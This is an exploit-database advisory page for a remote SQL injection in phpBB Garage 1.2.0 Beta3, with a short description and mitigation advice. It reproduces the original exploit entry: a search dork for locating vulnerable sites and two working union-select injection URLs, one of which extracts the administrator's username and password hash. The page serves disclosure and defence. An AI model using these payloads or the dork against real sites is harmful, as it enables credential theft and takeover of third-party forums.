header-logo
Suggest Exploit
vendor:
phpBB Garage
by:
maku234
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: phpBB Garage
Affected Version From: 1.2.0 - Beta3
Affected Version To: 1.2.0 - Beta3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpBB Garage v1.2.0 – Beta3 Remote SQL Injection Vulnerability

The phpBB Garage v1.2.0 - Beta3 is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by injecting malicious SQL queries through the 'make_id' parameter in the 'browse' mode of the 'garage.php' script. By manipulating the SQL query, the attacker can retrieve sensitive information such as user passwords and usernames from the 'phpbb_users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or upgrade to a newer version of phpBB Garage that addresses this issue. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork:  "Powered By phpBB Garage 1.2.0"

Author:  maku234
E-Mail: maku234@gmail.com



garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*

# milw0rm.com [2007-12-03]

Navigation

Suggest Exploit

Services By CQR